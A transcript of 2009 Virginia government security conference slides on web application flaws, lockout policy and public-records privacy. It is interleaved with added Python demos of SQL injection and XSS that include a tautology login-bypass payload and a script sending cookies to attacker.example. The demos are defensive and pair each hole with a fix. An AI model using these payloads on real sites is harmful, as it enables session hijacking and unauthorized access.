First Annual Commonwealth Information Security Conference .


Transcript of First Annual Commonwealth Information Security Conference .

Page 1: First Annual Commonwealth Information Security Conference .

First Annual CommonwealthInformation Security Conference

www.vita.virginia.gov

Page 2: First Annual Commonwealth Information Security Conference .

Agenda

• Walter Kucharski – Top 10 Commonwealth Information Security Issues/Opportunities/Concerns/Risks

• John Green – Application Security: Why Firewalls Aren’t Enough Anymore

• Keynote: Gino Menchini – Government IT: The New Expectations and Challenges

• Randy Marchany – Unintended Consequences: Don't Create New Risks

• Eric Taylor – IT Seppuku: Why Do We Still Suffer Security Violations

• Bob Baskette – Social Engineering: Building Bridges to Confidential Data

Page 3: First Annual Commonwealth Information Security Conference .

Commonwealth Information Security Conference

November 2, 2009

Page 4: First Annual Commonwealth Information Security Conference .

AGA Top Ten List -- 2009

1. STIMULUS MONEY -- ARRA

2. DATA SECURITY

3. VITA/NORTHROP GRUMMAN

4. ENTERPRISE APPLICATION/DATA EXCHANGE STANDARDS

5. MORE TIMELY FINANCIAL INFORMATION

AUDITOR OF PUBLIC ACCOUNTS

Page 5: First Annual Commonwealth Information Security Conference .

AGA Top Ten List -- 2009

6. ADMINISTRATIVE DUTIES CONSOLIDATION

7. SUCCESSION PLANNING

8. PERFORMANCE MANAGEMENT / MEASURES

9. CONTRACT MANAGEMENT

10. PPEA / PPTA


Page 6: First Annual Commonwealth Information Security Conference .

The FUTURE -- 2009

• Financial statements will need to be completed and issued within 90 days and the single audit within 4 months

• The State needs newer accounting systems and one sole enterprise application will probably not be the answer

• Data security concerns will continue to grow

• There will be increasing e-commerce and data exchange between federal, local and state government

• Information technology infrastructure and systems will become commodities and shared


Page 7: First Annual Commonwealth Information Security Conference .

Concerns

• WHAT IS PRIVACY?

• WHAT IS TRANSPARENCY?


Page 8: First Annual Commonwealth Information Security Conference .

Concerns

• DATA SECURITY -- Employees

• VITA/NORTHROP GRUMMAN

• DATA EXCHANGE STANDARDS

• MORE TIMELY FINANCIAL INFORMATION

• CONSOLIDATING ADMINISTRATIVE DUTIES


Page 9: First Annual Commonwealth Information Security Conference .

Concerns

• ACCOUNTING/ WORKFLOW SYSTEM CONTROLS WILL REPLACE MANUAL CONTROLS

• E-COMMERCE AND DATA EXCHANGE BETWEEN FEDERAL, LOCAL AND STATE GOVERNMENT

• SHARED INFORMATION TECHNOLOGY INFRASTRUCTURE AND SYSTEMS AS COMMODITIES


Page 10: First Annual Commonwealth Information Security Conference .

What is an ISO

• Paper pusher or Policeman

• Management Oversight or One of the Gang

• Tail-end Reviewer or System Developer and Guardian

• Risk Manager or Elephant Parade Cleaner


Page 11: First Annual Commonwealth Information Security Conference .

Application Security: Why Firewalls Are Not Enough

John Green
Chief Information Security Officer
Commonwealth of Virginia

Page 12: First Annual Commonwealth Information Security Conference .

Today’s Agenda

• Introduction
• Lessons From History
• Threats and Vulnerabilities
• Opportunities For Mitigation
• Resources
• Questions

Page 13: First Annual Commonwealth Information Security Conference .

Application Vulnerabilities Skyrocketing!

Web vulnerabilities have increased from 1.9% of all published vulnerabilities in 2006 to over 52% in 2009.

Application vulnerabilities from 2007 to 2008 increased by 154%.

WhiteHat Security said about 70% of websites it scans are likely to have at least one critical website vulnerability.

Source: http://www.ncircle.com/index.php?s=solution_Web-Application-Vulnerability-Statistics

Page 14: First Annual Commonwealth Information Security Conference .

Largest Breaches In History


Page 15: First Annual Commonwealth Information Security Conference .

Why? Money!

Page 16: First Annual Commonwealth Information Security Conference .

Firewalls Are No Longer Enough

• Firewalls have been around a while

• Primary purpose: To stop unwanted traffic from crossing network boundaries

• Hackers are walking right through them

• Perimeter firewalls are necessary, but no longer sufficient!

• History shows us why

Page 17: First Annual Commonwealth Information Security Conference .


Impenetrable Defenses Of France

"We could hardly dream of building a kind of Great Wall of France, which would in any case be far too costly. Instead we have foreseen powerful but flexible means of organizing defense, based on the dual principle of taking full advantage of the terrain and establishing a continuous line of fire everywhere."— Maginot

Page 18: First Annual Commonwealth Information Security Conference .

21st Century Maginot Line

(Diagram labels: Email, Web, Router, Router, Internal Networks)

Maginot Line: Term used now for something that is confidently relied upon but ends up being ineffective.

Page 19: First Annual Commonwealth Information Security Conference .


May 10, 1940 - What Went Wrong?

• Defenses based on past threat
  – Perimeter protection
  – No layered defenses

• Holes
  – Ardennes Forest
  – Belgium was an ally

• Maginot Line never fell
  – Bypassed
  – Surrendered

Page 20: First Annual Commonwealth Information Security Conference .

Firewalls Do Not Stop Today’s Threat

(Diagram labels: Email, Web, Router, Router, DB Server, DB Server, Internal Networks)

Page 21: First Annual Commonwealth Information Security Conference .

2008 Symantec Threat Report

• 63 percent of vulnerabilities affected Web applications, an increase from 59 percent in 2007

• There were 12,885 site-specific cross-site scripting vulnerabilities identified, compared to 17,697 in 2007; of the vulnerabilities identified in 2008, only 3 percent (394 vulnerabilities) had been fixed at the time of writing.

• The education sector represented the highest number of known data breaches that could lead to identity theft, accounting for 27 percent of the total

• The government sector ranked second and accounted for 20 percent of data breaches that could lead to identity theft.

• Hacking ranked second for identities exposed in 2008, with 22 percent; this is a large decrease from 2007, when hacking accounted for 62 percent of total identities exposed.

Source: http://www.symantec.com/business/theme.jsp?themeid=threatreport

Page 22: First Annual Commonwealth Information Security Conference .

OWASP Top 10 Application Flaws


• Cross Site Scripting (XSS): XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

• Injection Flaws: Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.

• Malicious File Execution: Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.

• Insecure Direct Object Reference: A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.

• Cross Site Request Forgery (CSRF): A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.

• Information Leakage and Improper Error Handling: Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data, or conduct more serious attacks.

• Broken Authentication and Session Management: Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.

• Insecure Cryptographic Storage: Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes.

• Insecure Communications: Applications frequently fail to encrypt network traffic when it is necessary.

• Failure to Restrict URL Access: Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.

Source: http://www.owasp.org/index.php/Top_10_2007

Page 23: First Annual Commonwealth Information Security Conference .

WASC Application Vulnerability Statistics

Source: http://projects.webappsec.org/Web-Application-Security-Statistics

Web Application Security Consortium (WASC) Report 2008 includes data from 12,186 web applications evaluated.

Compared to 2007, the number of sites with widespread SQL Injection and Cross-site Scripting vulnerabilities fell by 13% and 20%, respectively; however, the number of sites with different types of Information Leakage rose by 24%.

On the other hand, the probability to compromise a host automatically rose from 7% to 13%.

Page 24: First Annual Commonwealth Information Security Conference .

SQL-injection Information

• Can occur whenever client-side data is used to construct an SQL query without first adequately constraining or sanitizing the client-side input. The use of dynamic SQL statements (the formation of SQL queries from several strings of information) can provide the conditions needed to exploit the backend database that supports the web server.

• SQL injections allow for the execution of SQL code under the privileges of the system ID used to connect to the backend database.

• Malicious code can be inserted into a web form field or the website’s code to make a system execute a command-shell or other arbitrary command.

• In addition to command execution exploitation, this vulnerability may allow a malicious individual to change the content of the back-end database and therefore the information displayed by the website.
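The "dynamic SQL" condition described on this slide, as an added example that is not part of the original slides: a login query built by string concatenation beside the parameterized form that removes the injection point. The table, rows and attacker payload are constructed for the demonstration; the database is an in-memory SQLite instance.

```python
# Added example, not from the slides: the "dynamic SQL" condition the
# slide describes, shown against the parameterized form that removes it.
# Uses an in-memory SQLite database with constructed sample rows.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway users table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_dynamic_sql(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Vulnerable: client-side input is spliced into the query text, so the
    input can rewrite the query's structure rather than just its values."""
    query = (
        "SELECT username, role FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened: the query text is fixed; input is bound as parameters and is
    never interpreted by the SQL engine as part of the statement."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


# Constructed attacker input: closes the password literal and appends a
# tautology, so the WHERE clause becomes (... AND password = '') OR '1'='1'.
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("dynamic SQL  :", login_dynamic_sql(db, "alice", PAYLOAD))   # every row
    print("parameterized:", login_parameterized(db, "alice", PAYLOAD))  # []
```

The vulnerable path returns every row because AND binds tighter than OR, so the injected tautology satisfies the clause for all users, and the same technique extends to UNION queries or, on some engines, stacked statements. The parameterized path returns nothing for the same input; the driver sends the structure and the values separately, which is the control, not quoting or filtering characters.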

Page 25: First Annual Commonwealth Information Security Conference .

Cross-Site Scripting (XSS)

• Allows a malicious individual to utilize a website address that does not belong to the malicious individual for malicious purposes.

• Cross Site Scripting attacks are the result of improper filtering of input obtained from unknown or untrusted sources.

• Cross-Site Scripting attacks occur when a malicious individual utilizes a web application to send malicious code, generally in the form of a browser side script, to an unsuspecting user.

• The parameters entered into a web form are processed by the web application and the correct combination of variables can result in arbitrary command execution.

Page 26: First Annual Commonwealth Information Security Conference .

Cross-Site Scripting (XSS)

• The unsuspecting user’s browser has no way to know that the script should not be trusted, and will execute the script.

• Because the unsuspecting user’s browser believes that the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the unsuspecting user’s browser.

• The injected code then takes advantage of the trust given by the unsuspecting user to the vulnerable site. These attacks are usually targeted to all users of a web application instead of the application itself.
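The "improper filtering of input" and "without first validating or encoding" failure from the two XSS slides, as an added example that is not part of the original slides: a reflected search term rendered into two output contexts, HTML body and attribute value, each beside its encoded form. Templates, payloads and the two marker functions are constructed for the demonstration; encoding is done with Python's standard html module.

```python
# Added example, not from the slides: reflected XSS from unencoded output
# in two contexts (HTML body, attribute value), each beside its encoded
# form. Templates, payloads and marker checks are constructed.
import html

BODY_TEMPLATE = "<p>Results for: {term}</p>"
ATTR_TEMPLATE = '<input name="q" value="{term}">'


def render_body_unencoded(term: str) -> str:
    """Vulnerable: user input becomes page markup unchanged."""
    return BODY_TEMPLATE.format(term=term)


def render_body_encoded(term: str) -> str:
    """Hardened for the HTML body context: <, > and & become entities, so
    the browser renders the text instead of parsing it as tags."""
    return BODY_TEMPLATE.format(term=html.escape(term, quote=False))


def render_attr_unencoded(term: str) -> str:
    """Vulnerable: a double quote in the input closes the value attribute
    and whatever follows is parsed as new attributes."""
    return ATTR_TEMPLATE.format(term=term)


def render_attr_encoded(term: str) -> str:
    """Hardened for the attribute context: quote=True also encodes " and ',
    which the body-only rule above leaves alone."""
    return ATTR_TEMPLATE.format(term=html.escape(term, quote=True))


def has_raw_script_tag(page: str) -> bool:
    """Crude marker for the demo: a literal <script tag is executable."""
    return "<script" in page.lower()


def breaks_out_of_attribute(page: str) -> bool:
    """Crude marker for the demo: a raw quote followed by an event handler."""
    return '" onmouseover="' in page


# Constructed payloads: one targets the body, one the attribute context.
BODY_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = 'x" onmouseover="alert(document.cookie)'

if __name__ == "__main__":
    print(render_body_unencoded(BODY_PAYLOAD))  # script tag reaches the browser
    print(render_body_encoded(BODY_PAYLOAD))    # &lt;script&gt; rendered as text
    print(render_attr_unencoded(ATTR_PAYLOAD))  # closes value="", adds a handler
    print(render_attr_encoded(ATTR_PAYLOAD))    # &quot; keeps it inside the value
```

The point the two contexts make is that output encoding has to match where the value lands: the body rule is not enough inside an attribute, and neither rule is enough inside a script block or a URL. Encode at output time for the specific context, keep server-side input validation as a second layer, and mark session cookies HttpOnly so a script that does run cannot read them directly.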

Page 27: First Annual Commonwealth Information Security Conference .

Opportunities For Mitigation

• Personnel Awareness & Training
• Systems Development Life Cycle
• New Development
• Application Procurement
• Legacy Applications

Page 28: First Annual Commonwealth Information Security Conference .

Systems Development Life Cycle

• Project Initiation
  – Classify the data that the system will process
  – Determine if sensitive data absolutely must be collected and/or stored
  – Perform risk analysis based on known requirements & classification of data
  – Develop an initial IT System Security Plan

• Project Definition
  – Identify, document & incorporate security control requirements into IT System design specifications
  – Develop evaluation procedures to validate that security controls
  – Update the IT System Security Plan to include controls

• Implementation
  – Execute the evaluation procedures
  – Conduct a risk assessment to evaluate overall system risk
  – Update the IT System Security Plan to include controls

• Disposition
  – Require that data retention schedules are adhered to
  – Require that electronic media is sanitized prior to disposal

Page 29: First Annual Commonwealth Information Security Conference .

New Development

• Push security involvement to the front end of development:
  – Security Design (for sensitive systems)
    • Encrypted communication channels
    • Sensitive information shall not be stored in hidden fields
  – Application Development
    • Application-based authentication shall be performed for access to data that is not considered publicly accessible
    • Support inactivity timeouts on user sessions
    • Data storage must be separated from the application interface
    • Validate all input irrespective of source, focus on server-side
    • Implement a default deny policy for access control
    • Use the least set of privileges required for processing
    • Internal testing must include one of: penetration testing, fuzz testing or source code auditing
    • Clear cached and temporary data upon exit
  – Production and Maintenance
    • Scan internet-facing sensitive applications periodically for vulnerabilities

Page 30: First Annual Commonwealth Information Security Conference .

Applications Procurement

• Work to incorporate language into contracts that includes:
  – General
    • Personnel, Security Training, Background Checks
    • Vulnerabilities, Risks and Threats
    • Application Development
  – Development Environment
    • Secure coding, Configuration management, Distribution, Disclosure, Evaluation
  – Testing
    • General, Source Code, Vulnerability and Penetration Test
    • Patches and Updates
    • Tracking Security Issues
  – Delivery Of The Secure Application
    • Self Certification
    • No Malicious Code
  – Security Acceptance And Maintenance
    • Acceptance
    • Investigating Security Issues

Source: http://www.sans.org/appseccontract/

Page 31: First Annual Commonwealth Information Security Conference .

Legacy Applications

• Periodic application vulnerability scanning
• Strong configuration management
• If vulnerabilities are identified:
  – Each application may have specific challenges
  – Case by case analysis may reveal options:
    • Easy fix
    • Virtualization
    • Host based intrusion prevention
    • Application firewall technology
    • Third party integration
    • Other technology

Page 32: First Annual Commonwealth Information Security Conference .

Resources


Page 33: First Annual Commonwealth Information Security Conference .

www.OWASP.org


Page 34: First Annual Commonwealth Information Security Conference .

2009 CWE/SANS Top 25


Page 35: First Annual Commonwealth Information Security Conference .

http://iase.disa.mil/stigs/checklist/


Page 36: First Annual Commonwealth Information Security Conference .

http://trustedsignal.com/secDevChecklist.html


Recommended!

Page 37: First Annual Commonwealth Information Security Conference .

Organizational Resources

• Agency Information Security Officer
• Commonwealth Security and Risk Management
• Other Resources?

[email protected]

Page 38: First Annual Commonwealth Information Security Conference .

Conclusions

• Largest breaches in history due to application vulnerabilities
• Firewalls are necessary but won’t protect vulnerable applications
• SQL injection and Cross Site Scripting top the lists of vulnerabilities measured and attacked
• Many opportunities to address the problem of insecure code
• Plenty of resources to help, USE THEM!

Page 39: First Annual Commonwealth Information Security Conference .


"Fixed fortifications are monuments to the stupidity of man."

GEN. Patton on “Usefulness of Firewalls”

Page 40: First Annual Commonwealth Information Security Conference .

Questions?

Thank You!

[email protected]


Page 41: First Annual Commonwealth Information Security Conference .

Proprietary | Confidential

DRAFT for Review_v.4

Gino Menchini
Managing Director

IT’S ALL ABOUT SERVICE

Page 42: First Annual Commonwealth Information Security Conference .


The City of New York

• Resident population of over 8 million; daytime population of 10 million

• Over 350,000 City employees, 300,000 retirees
• New York City Government includes its 5 counties
• The 1 million student school system reports to the Mayor
• Annual budget exceeds $59.5 billion dollars

• If New York City was a private sector corporation, it would be in the Top 30 of the Fortune 500 companies

• Over 120 agencies, offices, and organizations make up “The City”

Page 43: First Annual Commonwealth Information Security Conference .


New York City as a Bellwether – Local Government IT on Steroids

• New Breed of Leadership – Significant expansion in the role of IT

• Mayor Michael R. Bloomberg – Business & IT experience

• Younger commissioners, senior staff, and legislators demand more of IT

• Higher expectations on Government from the public

• They demand to perform transactions seamlessly through the Government walk-in, web and call centers

• Public’s perception of the competency of an administration is increasingly shaped by the ease of access/response

Page 44: First Annual Commonwealth Information Security Conference .


The role of IT in Emergency Response and Preparedness

• Focus on Public Safety Technologies
  • 911 & CAD systems and infrastructure - 311
  • First Responder Radio infrastructure
  • Command and Control Communications
  • Greater Dependence on:
    • GIS
    • Email – Blackberries

• New Technologies
  • Video Surveillance Systems – Sensor systems
  • Hospital Emergency Room monitoring systems
  • AVL
  • Emergency Management Systems
  • Real time Crime Center
  • Intelligent Transportation systems
  • Access control systems

• Telecomm carrier infrastructure survivability – post 9/11

• Municipal IT infrastructure – Redundancy/Survivability

Page 45: First Annual Commonwealth Information Security Conference .


New York City as a Bellwether – Local Government IT on Steroids

• IT is now at the decision making table – Are we ready?

• Guide and manage a larger volume of IT projects simultaneously while advancing our IT Strategy

• Be prepared to deliver IT projects rapidly – high availability systems

• Provide solutions to address the problem of the day – Be relevant

Page 46: First Annual Commonwealth Information Security Conference .


NYC Department of Information Technology and Telecommunications - Then

Page 47: First Annual Commonwealth Information Security Conference .


The role of the NYC Department of Information Technology and Telecommunications - Now

Page 48: First Annual Commonwealth Information Security Conference .


New technologies – implemented rapidly

Page 49: First Annual Commonwealth Information Security Conference .


New York City’s Agencies and IT

• Highly diverse range of services, unlike private sector.

– Virtually the entire range of Government Public Sector Services are provided by New York City – from Child care to Anti-terrorism, Street cleaning to fresh water reservoirs.

– Agencies are organized and staffed to focus on their area of responsibility and specialization (silos).

– Specialized agency specific IT applications need to be implemented and supported by agencies.

– High availability is required. Security is expected.

Page 50: First Annual Commonwealth Information Security Conference .

Unintended Consequences: Don’t Create New Risks
Randy Marchany, VA Tech IT Security Office

Page 51: First Annual Commonwealth Information Security Conference .

What People Think of Security

(Diagram labels: Internal Network; The Big Bad Internet; The Firewall will protect us!)

Page 52: First Annual Commonwealth Information Security Conference .

What I meant is not what I said

• Schneier’s article
  – http://www.schneier.com/essay-210.html
• Google street view
• County records
• Account lockout – the easy DOS
• SSN finders – SSN generators?
• Fundrace.org
• P2P
• Spammers and FOIA
• Classroom locks?
• Emergency Messaging Systems

Page 53: First Annual Commonwealth Information Security Conference .

Inside the Twisted Mind….

• Security mindset involves thinking how things can be made to fail
• Otherwise, you never notice most security problems
• Designers are so focused on making systems work that they don’t notice how they might fail
• They don’t notice how those failures might be exploited

Page 54: First Annual Commonwealth Information Security Conference .

Inside the Twisted Mind…..

• Uncle Milton’s Ant Farm
  – You filled out a card with your address and they’d mail you some ants but…..
  – They’ll send a tube of live ants to anyone you tell them to
• Smartwater
  – Liquid with unique id linked to an owner
  – I’ll paint mine on YOUR stuff and then call the police

Page 55: First Annual Commonwealth Information Security Conference .

Inside The Twisted Mind…

• Auto Dealership Service Centers
  – Get my car by giving them my name
  – Get your car by giving them your name
• Laser Printers
  – Use their disks for your storage
• City Surveillance
  – Who watches the watchers?
  – Can you corrupt stored camera images?

Page 56: First Annual Commonwealth Information Security Conference .
Page 57: First Annual Commonwealth Information Security Conference .
Page 58: First Annual Commonwealth Information Security Conference .

Account Lockout

• What’s the purpose of the lockout?
• Log failed attempts?
  – Multiple entries in a short period of time usually indicate a brute force attack
• Password strength rules in effect?
  – Designed to prevent guessable passwords

Page 59: First Annual Commonwealth Information Security Conference .

Account Lockout

• How long does it take to reset the account?
  – Minutes?
  – Hours?
  – Forever?
  – After hours?
• So, what if my attack is to lock you out?

Page 60: First Annual Commonwealth Information Security Conference .

Account Lockouts

• Account Lockout Policy
  – 25+ year defense
  – Old Unix systems had no password controls so this was the only defense against brute force guessing
  – AIX 3.1 (~1993) was one of the first with password controls
• Why are we still using a 25 year defense if the other controls are more effective?
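The "what if my attack is to lock you out?" scenario from the three account-lockout slides, as an added example that is not part of the original slides: a simulation of a hard per-account lockout beside a per-source throttle that logs failures. The credential, addresses, thresholds and class names are constructed assumptions for the demonstration.

```python
# Added example, not from the slides: a hard account lockout hands an
# attacker who knows only a username a denial-of-service lever; a
# per-source throttle with failure logging slows guessing without it.
# Credential, addresses and thresholds are constructed assumptions.
from collections import defaultdict

USERS = {"alice": "correct horse"}  # constructed sample credential


class HardLockoutAuth:
    """Classic policy: N failures on an account lock it, whatever the source."""

    def __init__(self, threshold: int = 3):
        self.threshold = threshold
        self.failures = defaultdict(int)   # keyed by username
        self.locked = set()

    def login(self, user: str, password: str, source_ip: str) -> str:
        if user in self.locked:
            return "locked"
        if USERS.get(user) == password:
            self.failures[user] = 0
            return "ok"
        self.failures[user] += 1
        if self.failures[user] >= self.threshold:
            self.locked.add(user)       # the attacker reached this line, not alice
        return "denied"


class ThrottledAuth:
    """Alternative: failures are counted per (source, user) and logged, so
    a guessing source is slowed while the account owner elsewhere is not."""

    def __init__(self, threshold: int = 3):
        self.threshold = threshold
        self.failures = defaultdict(int)   # keyed by (source_ip, user)
        self.log = []                       # audit trail of failures/throttles

    def login(self, user: str, password: str, source_ip: str) -> str:
        key = (source_ip, user)
        if self.failures[key] >= self.threshold:
            self.log.append(f"throttled source={source_ip} user={user}")
            return "throttled"
        if USERS.get(user) == password:
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        self.log.append(f"failed source={source_ip} user={user} n={self.failures[key]}")
        return "denied"


def simulate(auth) -> str:
    """Attacker at 203.0.113.9 guesses alice's password five times, then
    alice logs in correctly from 198.51.100.7. Returns alice's outcome."""
    for guess in ("password", "123456", "alice", "letmein", "qwerty"):
        auth.login("alice", guess, "203.0.113.9")
    return auth.login("alice", "correct horse", "198.51.100.7")


if __name__ == "__main__":
    print("hard lockout:", simulate(HardLockoutAuth()))   # locked
    print("throttled   :", simulate(ThrottledAuth()))     # ok
```

With the hard lockout the owner is the one denied service; with the throttle the guessing source is slowed and the log shows the burst of failures the slide says indicates brute forcing. Keying on source address has its own limits, since an attacker with many addresses spreads the count and users behind one NAT share it, so real deployments pair this with strong password rules, increasing delays or a challenge rather than a permanent block.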

Page 61: First Annual Commonwealth Information Security Conference .

SSN Finders or SSN Generators?

• Software to search for sensitive data on computers
  – Can they be used to generate SSN/CCN?
• Freeware
  – VT – Find_SSNs
  – Cornell – Spider
  – UT-Austin – SENF
• Commercial
  – IdentityFinder
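The kind of sensitive-data finder this slide lists, as an added example that is not part of the original slides or of any of the named tools: a scanner that flags SSN- and card-number-shaped strings in text and uses structural checks (SSA area/group/serial rules, the Luhn check for card numbers) to drop false positives. The regular expressions, the rules applied and the sample text are constructed for the demonstration; the SSN pattern covers only the dashed form.

```python
# Added example, not from the slides or the tools named on them: a minimal
# sensitive-data finder with structural checks to cut false positives.
# Patterns, rules and the sample text are constructed; only dashed SSNs
# are matched here.
import re

SSN_RE = re.compile(r"\b(\d{3})-(\d{2})-(\d{4})\b")
CCN_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")


def plausible_ssn(area: str, group: str, serial: str) -> bool:
    """SSA format rules: area is never 000, 666 or 900-999; group and
    serial are never all zeros."""
    a = int(area)
    if a == 0 or a == 666 or a >= 900:
        return False
    return group != "00" and serial != "0000"


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_sensitive(text: str) -> list:
    """Return (kind, value) hits that pass the structural checks."""
    hits = []
    for m in SSN_RE.finditer(text):
        if plausible_ssn(*m.groups()):
            hits.append(("ssn", m.group(0)))
    for m in CCN_RE.finditer(text):
        digits = re.sub(r"\D", "", m.group(0))
        if 13 <= len(digits) <= 16 and luhn_ok(digits):
            hits.append(("ccn", digits))
    return hits


# Constructed sample: one real-shaped SSN, a phone number, two SSN-shaped
# values that break the SSA rules, a well-known test card number, and a
# card-shaped run that fails Luhn.
SAMPLE_TEXT = """Constructed sample, not real data:
payroll note: employee SSN 123-45-6789, contact 540-231-9523
invalid SSN-shaped values 000-12-3456 and 666-01-0001
card on file 4111 1111 1111 1111 (test number), order id 1234 5678 9012 3456
"""

if __name__ == "__main__":
    for kind, value in find_sensitive(SAMPLE_TEXT):
        print(kind, value)   # ssn 123-45-6789 / ccn 4111111111111111
```

The checks are what separate a useful finder from noise: without them every nine-digit dashed number and every sixteen-digit order id is a hit, and a scan of a file server drowns in false positives. The slide's question cuts the other way too: a tool that reliably confirms which strings are well-formed identifiers is as handy to someone harvesting them as to someone cleaning up, so treat scan output as sensitive and control who can run the tool and where its reports go.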

Page 62: First Annual Commonwealth Information Security Conference .

Inside the Twisted Mind…

Page 63: First Annual Commonwealth Information Security Conference .
Page 64: First Annual Commonwealth Information Security Conference .
Page 65: First Annual Commonwealth Information Security Conference .
Page 66: First Annual Commonwealth Information Security Conference .
Page 67: First Annual Commonwealth Information Security Conference .

P2P or P@!@#*($%)P

• Ban it says the RIAA/MPAA!
• Extension divisions use P2P to distribute videos/recordings to farmers
• YouTube
• Independent bands use P2P to sell or distribute their music
• Ban P2P…bring on the antitrust lawsuits
  – You’re restricting my ability to market my product

Page 68: First Annual Commonwealth Information Security Conference .

Spammers and FOIA

• A known spammer issued a FOIA request for all U of Texas faculty, staff and student email addresses
• Same thing happened in VA

Page 69: First Annual Commonwealth Information Security Conference .

Antivirus Software: Threat?

• My job is to test security tools
• AV Software deletes my tools because it thinks it knows better than me.
  – “We know what’s good for you….” syndrome
• It’s a race to create the exception list

Page 70: First Annual Commonwealth Information Security Conference .

Things That Make You Go Hmmm…

• Locks on doors
  – Bulletproof doors included?
  – Likelihood of mugging vs. worse
• Dealing with 2 separate incidents
  – First event happened ~7am
  – Second event happened ~930am almost ¾ mile away from the first event
• Insider attack

Page 71: First Annual Commonwealth Information Security Conference .

(Map labels: Approx. 2 miles; Yes, it’s an Airport…; Campus Lockdown?)

Page 72: First Annual Commonwealth Information Security Conference .
Page 73: First Annual Commonwealth Information Security Conference .
Page 74: First Annual Commonwealth Information Security Conference .

Understand Your Audience

• Security Process without regard to Business Process
• Business Processes rule the world
• Physical security rules can be translated to cybersecurity rules
• IT people focus on technology not the business process. Wrong!
• Business process doesn’t consult IT when buying new gadgets

Page 75: First Annual Commonwealth Information Security Conference .

Use Risk Analysis to Build DR Plan

(Diagram labels, top to bottom: Business Process A, Business Process B, Business Process C; Oracle DB, Forms Servers, Auth Servers; Host A, Host B, Host C, Host D, Host E, Host F)

Page 76: First Annual Commonwealth Information Security Conference .

We have met the enemy and it is vendors…..

Page 77: First Annual Commonwealth Information Security Conference .

It’s Insecure Out of the Box

• Viruses will never be eliminated
  – Multibillion $ industry to fight them
  – Eliminate the threat, we no longer have multibillion $ industry.
• Wireless cash register software sending data in the clear
• Document imaging systems sending data in the clear
• Govt/LE records digitized by insecure software
• Printers, copiers based on NT!

Page 78: First Annual Commonwealth Information Security Conference .

It’s Insecure Out of the Box

• Security vs. Convenience
  – Let the users debug the code
• OS vendors are starting to see the light
  – Windows XP/2003 with security features enabled
  – Apple OSX
  – Linux systems with firewall enabled
• Application Vendors still don’t get it
  – Oracle stepped in it
  – http://news.com.com/When+security+researcher+become+the+problem/2010-1071_3-5807074.html

Page 79: First Annual Commonwealth Information Security Conference .
Page 80: First Annual Commonwealth Information Security Conference .
Page 81: First Annual Commonwealth Information Security Conference .
Page 82: First Annual Commonwealth Information Security Conference .

(Figure labels: Unlocked Key; Mean Transmission; In the Clear!)

Page 83: First Annual Commonwealth Information Security Conference .
Page 84: First Annual Commonwealth Information Security Conference .

Why buy the cow when you can get the milk for free?

Page 85: First Annual Commonwealth Information Security Conference .
Page 86: First Annual Commonwealth Information Security Conference .
Page 87: First Annual Commonwealth Information Security Conference .
Page 88: First Annual Commonwealth Information Security Conference .
Page 89: First Annual Commonwealth Information Security Conference .
Page 90: First Annual Commonwealth Information Security Conference .

Obtaining Personal Information

• Public Records can be accessed from anywhere in the world.
• Local governments are allowing access to sensitive info via the Web without thinking about security.

Page 91: First Annual Commonwealth Information Security Conference .

County Clerks and Identity Theft

• Making legal docs available on the net w/o good security practices.
• A secure www site isn’t enough
• Tom Delay SSN From Public Records
• Jeb Bush SSN From Public Documents
• Colin Powell Deed of Trust
• Colin Powell SSN from Public Records
• Do County Clerks (by extension, the state legislature) facilitate ID Theft?

Page 92: First Annual Commonwealth Information Security Conference .

What’s Going On Here?

• We’re spending $$$ to protect sensitive data (SSN) but….
• State govt is allowing SSN info to be obtained online so….
• Laws need to be coordinated but….
• Update: VA passed a law (7/1/08) that makes it illegal to distribute SSN legally obtained from public govt www sites

Page 93: First Annual Commonwealth Information Security Conference .
Page 94: First Annual Commonwealth Information Security Conference .

The Twisted Mind…

• If you’re not doing anything illegal, you shouldn’t care whether you’re “surveilled”
• What if I just want to track you?
• NY Times article on bored security staff tracking people on the streets….

Page 95: First Annual Commonwealth Information Security Conference .

Cell phone voicemail easily hacked
They got Paris Hilton's contacts, and could get yours, too
By Bob Sullivan, Technology correspondent, MSNBC
